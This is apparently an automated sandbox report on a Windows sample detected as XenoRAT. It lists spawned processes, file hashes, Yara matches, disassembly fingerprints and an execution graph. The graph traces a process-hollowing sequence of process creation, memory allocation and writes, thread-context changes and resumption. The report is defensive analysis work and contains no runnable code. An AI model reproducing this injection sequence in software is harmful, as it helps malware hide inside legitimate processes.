                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:02:03:26
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:02:03:27
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x6b0000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 0000001F.00000002.1647276247.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 0000001F.00000002.1647276247.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:02:03:28
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:33
                                                                                                                                                Start time:02:03:29
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x180000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:35
                                                                                                                                                Start time:02:03:30
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x650000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:37
                                                                                                                                                Start time:02:03:30
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80
                                                                                                                                                Imagebase:0x540000
                                                                                                                                                File size:483'680 bytes
                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007FFAACC1727E Relevance: 2.5, Strings: 1, Instructions: 1296COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 6E=
                                                                                                                                                  • API String ID: 0-3739184901
                                                                                                                                                  • Opcode ID: d781343e4f951fc313df8f14160379f8b794350a93b24a97d7394bea4f667398
                                                                                                                                                  • Instruction ID: 3c9088391ffaeb5b86e58a18062ae599c7a99816c9b4ef7a6f47619bc06c4a4d
                                                                                                                                                  • Opcode Fuzzy Hash: d781343e4f951fc313df8f14160379f8b794350a93b24a97d7394bea4f667398
                                                                                                                                                  • Instruction Fuzzy Hash: 71914352A0EBD6CFF7969B3908251B56BD1DF43210B1880BAD48DC71D3ED18EC4A83C1
                                                                                                                                                  Function 00007FFAACC1667D Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: J_L;
                                                                                                                                                  • API String ID: 0-1607133157
                                                                                                                                                  • Opcode ID: af18e8efd380f372cb51717a6d0ae7a740ebf6e0f64716a5570ba9425cda5600
                                                                                                                                                  • Instruction ID: 72bace9b0244dc51beb03dd3b21b4724acad913b2f90124cd446df85adf51a1f
                                                                                                                                                  • Opcode Fuzzy Hash: af18e8efd380f372cb51717a6d0ae7a740ebf6e0f64716a5570ba9425cda5600
                                                                                                                                                  • Instruction Fuzzy Hash: 28D1046690EB868FF75A9B2858165B47FE1EF53210B0941FFD18DC71E3DA18AC49C382
                                                                                                                                                  Function 00007FFAACC16757 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: J_L;
                                                                                                                                                  • API String ID: 0-1607133157
                                                                                                                                                  • Opcode ID: f940b993369a7922fe795738f5b76931b0566676431d21b0a0f49426ea339ba5
                                                                                                                                                  • Instruction ID: c91c875610804a4d963d7217b274d396dd28c2a2f0a0fc72af1e68c91526828c
                                                                                                                                                  • Opcode Fuzzy Hash: f940b993369a7922fe795738f5b76931b0566676431d21b0a0f49426ea339ba5
                                                                                                                                                  • Instruction Fuzzy Hash: 363155AAE1FB878BF7599B2A482607866D0EF53210B1840BED64EC30D3DD19EC0D83C1
                                                                                                                                                  Function 00007FFAACC13135 Relevance: .4, Instructions: 430COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9fffa85f1ccba7d5f207df9cae2a6093979268ab8203da71d4bdcabc027d67dd
                                                                                                                                                  • Instruction ID: 3afb63a984ecd1090bcd0ee265d157979b221b94c6f1fedbec1a7485315d3ce8
                                                                                                                                                  • Opcode Fuzzy Hash: 9fffa85f1ccba7d5f207df9cae2a6093979268ab8203da71d4bdcabc027d67dd
                                                                                                                                                  • Instruction Fuzzy Hash: A9D1476290EA8A8FF756EB6D88155B5BBA0EF42314B4800BEE44DC71D3DA18EC09C391
                                                                                                                                                  Function 00007FFAACB433B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1444828161.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacb40000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                  • Instruction ID: d06cb320361b13ded840ff1a2540a5049fe41d2776c2545dc42fd516e1cbe298
                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                  • Instruction Fuzzy Hash: C401677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3691DB36E882CB45

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00007FFAACB43788 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1444828161.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacb40000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9e764ee07f2e26a082b40c54b88a649d4a065bd9b3bd7921d8ac997468c4d21c
                                                                                                                                                  • Instruction ID: d6b950732dac980691065caf9e053be99ff7aeaf33b94339f850c860189f9349
                                                                                                                                                  • Opcode Fuzzy Hash: 9e764ee07f2e26a082b40c54b88a649d4a065bd9b3bd7921d8ac997468c4d21c
                                                                                                                                                  • Instruction Fuzzy Hash: 2D51C2A291E7D3CFE357472CD8A64E67F60EF2362570842B6C0858B0D3EA09880AD7D5

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:19.7%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:10.1%
                                                                                                                                                  Total number of Nodes:238
                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                  execution_graph 13643 e9dfd8 13644 e9dff4 13643->13644 13653 4e380d8 13644->13653 13645 e9e0bd 13700 4e3a6e0 13645->13700 13737 4e3a6d1 13645->13737 13646 e9e11f 13774 4e3b5d8 13646->13774 13814 4e3b5c8 13646->13814 13647 e9e181 13654 4e380bc 13653->13654 13655 4e380e2 13653->13655 13654->13645 13854 4e321a4 13655->13854 13657 4e3829b 13678 4e394a0 NtReadVirtualMemory NtReadVirtualMemory 13657->13678 13679 4e39358 NtReadVirtualMemory NtReadVirtualMemory 13657->13679 13658 4e382d3 13684 4e394a0 NtReadVirtualMemory NtReadVirtualMemory 13658->13684 13685 4e39358 NtReadVirtualMemory NtReadVirtualMemory 13658->13685 13659 4e38317 13694 4e3a200 NtResumeThread 13659->13694 13695 4e3a208 NtResumeThread 13659->13695 13660 4e383d4 13672 4e394a0 NtReadVirtualMemory NtReadVirtualMemory 13660->13672 13673 4e39358 NtReadVirtualMemory NtReadVirtualMemory 13660->13673 13661 4e38496 13674 4e3a300 VirtualAllocEx 13661->13674 13675 4e3a308 VirtualAllocEx 13661->13675 13662 4e384d4 13682 4e394a0 NtReadVirtualMemory NtReadVirtualMemory 13662->13682 13683 4e39358 NtReadVirtualMemory NtReadVirtualMemory 13662->13683 13663 4e38633 13688 4e3a420 NtWriteVirtualMemory 13663->13688 13689 4e3a428 NtWriteVirtualMemory 13663->13689 13664 4e3866f 13690 4e394a0 NtReadVirtualMemory NtReadVirtualMemory 13664->13690 13691 4e39358 NtReadVirtualMemory NtReadVirtualMemory 13664->13691 13665 4e389f7 13676 4e3a580 NtSetContextThread 13665->13676 13677 4e3a579 NtSetContextThread 13665->13677 13666 4e38a8c 13692 4e3a420 NtWriteVirtualMemory 13666->13692 13693 4e3a428 NtWriteVirtualMemory 13666->13693 13667 4e38b38 13698 4e394a0 NtReadVirtualMemory NtReadVirtualMemory 13667->13698 13699 4e39358 NtReadVirtualMemory NtReadVirtualMemory 13667->13699 13668 4e38b86 13680 4e3a580 NtSetContextThread 13668->13680 13681 4e3a579 NtSetContextThread 13668->13681 13669 4e386ce 13669->13665 13686 4e3a420 NtWriteVirtualMemory 13669->13686 13687 4e3a428 NtWriteVirtualMemory 13669->13687 13670 4e38c65 13696 4e3a200 NtResumeThread 13670->13696 13697 4e3a208 NtResumeThread 13670->13697 13671 4e38d19 13671->13645 13672->13661 13673->13661 13674->13662 13675->13662 13676->13666 13677->13666 13678->13658 13679->13658 13680->13670 13681->13670 13682->13663 13683->13663 13684->13659 13685->13659 13686->13669 13687->13669 13688->13664 13689->13664 13690->13669 13691->13669 13692->13667 13693->13667 13694->13660 13695->13660 13696->13671 13697->13671 13698->13668 13699->13668 13701 4e3a719 13700->13701 13858 4e322ec 13701->13858 13703 4e3a893 13719 4e3b368 NtReadVirtualMemory NtReadVirtualMemory 13703->13719 13704 4e3a8cb 13720 4e3b368 NtReadVirtualMemory NtReadVirtualMemory 13704->13720 13705 4e3a90f 13725 4e3a200 NtResumeThread 13705->13725 13726 4e3a208 NtResumeThread 13705->13726 13706 4e3a9cb 13735 4e3b368 NtReadVirtualMemory NtReadVirtualMemory 13706->13735 13707 4e3aa8d 13717 4e3a300 VirtualAllocEx 13707->13717 13718 4e3a308 VirtualAllocEx 13707->13718 13708 4e3aacb 13730 4e3b368 NtReadVirtualMemory NtReadVirtualMemory 13708->13730 13709 4e3ac2a 13731 4e3a420 NtWriteVirtualMemory 13709->13731 13732 4e3a428 NtWriteVirtualMemory 13709->13732 13710 4e3ac66 13736 4e3b368 NtReadVirtualMemory NtReadVirtualMemory 13710->13736 13711 4e3acc5 13733 4e3a580 NtSetContextThread 13711->13733 13734 4e3a579 NtSetContextThread 13711->13734 13712 4e3b081 13723 4e3a420 NtWriteVirtualMemory 13712->13723 13724 4e3a428 NtWriteVirtualMemory 13712->13724 13713 4e3b12d 13727 4e3b368 NtReadVirtualMemory NtReadVirtualMemory 13713->13727 13714 4e3b17b 13721 4e3a580 NtSetContextThread 13714->13721 13722 4e3a579 NtSetContextThread 13714->13722 13715 4e3b259 13728 4e3a200 NtResumeThread 13715->13728 13729 4e3a208 NtResumeThread 13715->13729 13716 4e3b30c 13716->13646 13717->13708 13718->13708 13719->13704 13720->13705 13721->13715 13722->13715 13723->13713 13724->13713 13725->13706 13726->13706 13727->13714 13728->13716 13729->13716 13730->13709 13731->13710 13732->13710 13733->13712 13734->13712 13735->13707 13736->13711 13738 4e3a6e0 13737->13738 13739 4e322ec CreateProcessW 13738->13739 13740 4e3a893 13739->13740 13862 4e3b368 13740->13862 13742 4e3a90f 13867 4e3a200 13742->13867 13871 4e3a208 13742->13871 13743 4e3a9cb 13761 4e3b368 2 API calls 13743->13761 13744 4e3aa8d 13875 4e3a300 13744->13875 13879 4e3a308 13744->13879 13745 4e3aacb 13756 4e3b368 2 API calls 13745->13756 13746 4e3ac2a 13883 4e3a420 13746->13883 13887 4e3a428 13746->13887 13747 4e3ac66 13762 4e3b368 2 API calls 13747->13762 13748 4e3acc5 13891 4e3a580 13748->13891 13895 4e3a579 13748->13895 13749 4e3b081 13769 4e3a420 NtWriteVirtualMemory 13749->13769 13770 4e3a428 NtWriteVirtualMemory 13749->13770 13750 4e3b12d 13773 4e3b368 2 API calls 13750->13773 13751 4e3b17b 13767 4e3a580 NtSetContextThread 13751->13767 13768 4e3a579 NtSetContextThread 13751->13768 13752 4e3b259 13754 4e3a200 NtResumeThread 13752->13754 13755 4e3a208 NtResumeThread 13752->13755 13753 4e3b30c 13753->13646 13754->13753 13755->13753 13756->13746 13761->13744 13762->13748 13766 4e3b368 2 API calls 13766->13742 13767->13752 13768->13752 13769->13750 13770->13750 13773->13751 13775 4e3b60c 13774->13775 13907 4e3238c 13775->13907 13777 4e3b78b 13796 4e3c25f NtReadVirtualMemory NtReadVirtualMemory 13777->13796 13778 4e3b7c3 13800 4e3c25f NtReadVirtualMemory NtReadVirtualMemory 13778->13800 13779 4e3b807 13808 4e3a200 NtResumeThread 13779->13808 13809 4e3a208 NtResumeThread 13779->13809 13780 4e3b8c3 13813 4e3c25f NtReadVirtualMemory NtReadVirtualMemory 13780->13813 13781 4e3b985 13792 4e3a300 VirtualAllocEx 13781->13792 13793 4e3a308 VirtualAllocEx 13781->13793 13782 4e3b9c3 13799 4e3c25f NtReadVirtualMemory NtReadVirtualMemory 13782->13799 13783 4e3bb22 13803 4e3a420 NtWriteVirtualMemory 13783->13803 13804 4e3a428 NtWriteVirtualMemory 13783->13804 13784 4e3bb5e 13805 4e3c25f NtReadVirtualMemory NtReadVirtualMemory 13784->13805 13785 4e3bee6 13794 4e3a580 NtSetContextThread 13785->13794 13795 4e3a579 NtSetContextThread 13785->13795 13786 4e3bbbd 13786->13785 13801 4e3a420 NtWriteVirtualMemory 13786->13801 13802 4e3a428 NtWriteVirtualMemory 13786->13802 13787 4e3bf79 13806 4e3a420 NtWriteVirtualMemory 13787->13806 13807 4e3a428 NtWriteVirtualMemory 13787->13807 13788 4e3c025 13812 4e3c25f NtReadVirtualMemory NtReadVirtualMemory 13788->13812 13789 4e3c073 13797 4e3a580 NtSetContextThread 13789->13797 13798 4e3a579 NtSetContextThread 13789->13798 13790 4e3c151 13810 4e3a200 NtResumeThread 13790->13810 13811 4e3a208 NtResumeThread 13790->13811 13791 4e3c204 13791->13647 13792->13782 13793->13782 13794->13787 13795->13787 13796->13778 13797->13790 13798->13790 13799->13783 13800->13779 13801->13786 13802->13786 13803->13784 13804->13784 13805->13786 13806->13788 13807->13788 13808->13780 13809->13780 13810->13791 13811->13791 13812->13789 13813->13781 13815 4e3b5d1 13814->13815 13816 4e3238c CreateProcessW 13815->13816 13817 4e3b78b 13816->13817 13911 4e3c25f 13817->13911 13819 4e3b807 13840 4e3a200 NtResumeThread 13819->13840 13841 4e3a208 NtResumeThread 13819->13841 13820 4e3b8c3 13845 4e3c25f 2 API calls 13820->13845 13821 4e3b985 13846 4e3a300 VirtualAllocEx 13821->13846 13847 4e3a308 VirtualAllocEx 13821->13847 13822 4e3b9c3 13853 4e3c25f 2 API calls 13822->13853 13823 4e3bb22 13835 4e3a420 NtWriteVirtualMemory 13823->13835 13836 4e3a428 NtWriteVirtualMemory 13823->13836 13824 4e3bb5e 13837 4e3c25f 2 API calls 13824->13837 13825 4e3bee6 13848 4e3a580 NtSetContextThread 13825->13848 13849 4e3a579 NtSetContextThread 13825->13849 13826 4e3bf79 13838 4e3a420 NtWriteVirtualMemory 13826->13838 13839 4e3a428 NtWriteVirtualMemory 13826->13839 13827 4e3c025 13844 4e3c25f 2 API calls 13827->13844 13828 4e3c073 13851 4e3a580 NtSetContextThread 13828->13851 13852 4e3a579 NtSetContextThread 13828->13852 13829 4e3bbbd 13829->13825 13833 4e3a420 NtWriteVirtualMemory 13829->13833 13834 4e3a428 NtWriteVirtualMemory 13829->13834 13830 4e3c151 13842 4e3a200 NtResumeThread 13830->13842 13843 4e3a208 NtResumeThread 13830->13843 13831 4e3c204 13831->13647 13832 4e3c25f 2 API calls 13832->13819 13833->13829 13834->13829 13835->13824 13836->13824 13837->13829 13838->13827 13839->13827 13840->13820 13841->13820 13842->13831 13843->13831 13844->13828 13845->13821 13846->13822 13847->13822 13848->13826 13849->13826 13851->13830 13852->13830 13853->13823 13856 4e321a6 CreateProcessW 13854->13856 13857 4e391ec 13856->13857 13859 4e322f3 CreateProcessW 13858->13859 13861 4e391ec 13859->13861 13863 4e3b39c 13862->13863 13899 4e39ca0 13863->13899 13903 4e39c98 13863->13903 13864 4e3a8cb 13864->13766 13868 4e3a208 NtResumeThread 13867->13868 13870 4e3a2a3 13868->13870 13870->13743 13872 4e3a24c NtResumeThread 13871->13872 13874 4e3a2a3 13872->13874 13874->13743 13876 4e3a306 VirtualAllocEx 13875->13876 13878 4e3a3c4 13876->13878 13878->13745 13880 4e3a30a VirtualAllocEx 13879->13880 13882 4e3a3c4 13880->13882 13882->13745 13884 4e3a426 NtWriteVirtualMemory 13883->13884 13886 4e3a50a 13884->13886 13886->13747 13888 4e3a42a NtWriteVirtualMemory 13887->13888 13890 4e3a50a 13888->13890 13890->13747 13892 4e3a5c9 NtSetContextThread 13891->13892 13894 4e3a641 13892->13894 13894->13749 13896 4e3a57e NtSetContextThread 13895->13896 13898 4e3a641 13896->13898 13898->13749 13900 4e39cec NtReadVirtualMemory 13899->13900 13902 4e39d64 13900->13902 13902->13864 13904 4e39ca0 NtReadVirtualMemory 13903->13904 13906 4e39d64 13904->13906 13906->13864 13909 4e38d88 CreateProcessW 13907->13909 13910 4e391ec 13909->13910 13912 4e3c294 13911->13912 13914 4e39ca0 NtReadVirtualMemory 13912->13914 13915 4e39c98 NtReadVirtualMemory 13912->13915 13913 4e3b7c3 13913->13832 13914->13913 13915->13913

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 04E320F8 Relevance: 2.0, APIs: 1, Instructions: 457COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ebe2ca42792e26669fd13a368dc1742223e0a3538bdc6939c07e902878541fb1
                                                                                                                                                  • Instruction ID: a80d0f696c586261f8cdd14bd417d07991bc2f3f25e4cf8be8751cf01ec5724c
                                                                                                                                                  • Opcode Fuzzy Hash: ebe2ca42792e26669fd13a368dc1742223e0a3538bdc6939c07e902878541fb1
                                                                                                                                                  • Instruction Fuzzy Hash: E21247B0D053588FEB22CFA8C894BDDBBF1BF49304F1491AAE448AB251D734A985CF55
                                                                                                                                                  Function 04E321B0 Relevance: 1.9, APIs: 1, Instructions: 430COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9b5fbb8e4adb6fac3315f940e5fdf846fa1102128d022ea2172e535a5d5d89ec
                                                                                                                                                  • Instruction ID: 9334ab09cb0e01fb86051df43ba1119804fe437edfcc7f924955cbf994a0c860
                                                                                                                                                  • Opcode Fuzzy Hash: 9b5fbb8e4adb6fac3315f940e5fdf846fa1102128d022ea2172e535a5d5d89ec
                                                                                                                                                  • Instruction Fuzzy Hash: EE0212B0D01328CFEB25CFA8C884B9DBBF1BF49305F1491AAE418AB251D734A985CF55
                                                                                                                                                  Function 04E322C9 Relevance: 1.9, APIs: 1, Instructions: 404COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e2da1e64c697b77900c4bdbd1967a21a8defd448893b36ca0d5436c4821f4686
                                                                                                                                                  • Instruction ID: 7d99eb69e2434ea5c32bde3be5023f7162d968d0b91e7ed21adb516fb9b55f86
                                                                                                                                                  • Opcode Fuzzy Hash: e2da1e64c697b77900c4bdbd1967a21a8defd448893b36ca0d5436c4821f4686
                                                                                                                                                  • Instruction Fuzzy Hash: 290203B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491AAE419B7251D770A985CF55
                                                                                                                                                  Function 04E321A4 Relevance: 1.9, APIs: 1, Instructions: 400processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 8fedf4a942e897419aa4d0175098eb91c0649ccbfe520bf7d0e4a78a77ac165e
                                                                                                                                                  • Instruction ID: 9471f598e4805def4ecbd9f51c53cb51c088ed6c5ead5d891088dc97a354d076
                                                                                                                                                  • Opcode Fuzzy Hash: 8fedf4a942e897419aa4d0175098eb91c0649ccbfe520bf7d0e4a78a77ac165e
                                                                                                                                                  • Instruction Fuzzy Hash: 5702E2B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB70A985CF55
                                                                                                                                                  Function 04E38D7C Relevance: 1.9, APIs: 1, Instructions: 387processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 66e7608f83166aa02955c6a0f39e852bc725bbb923911e6abd5f37d482fa9082
                                                                                                                                                  • Instruction ID: 632be26f77ee0010c870036351c278811d0f08d16046d33d24aa5052afe076cf
                                                                                                                                                  • Opcode Fuzzy Hash: 66e7608f83166aa02955c6a0f39e852bc725bbb923911e6abd5f37d482fa9082
                                                                                                                                                  • Instruction Fuzzy Hash: D6F1E1B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  Function 04E322EC Relevance: 1.9, APIs: 1, Instructions: 387processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 55f925db1a9028e85ac58207baa4984975b80c41aa968564c333720a7347b827
                                                                                                                                                  • Instruction ID: 050b37760ab90f4b1c8f9180c0709c76180c668be4b35c1ee740d3f255931b74
                                                                                                                                                  • Opcode Fuzzy Hash: 55f925db1a9028e85ac58207baa4984975b80c41aa968564c333720a7347b827
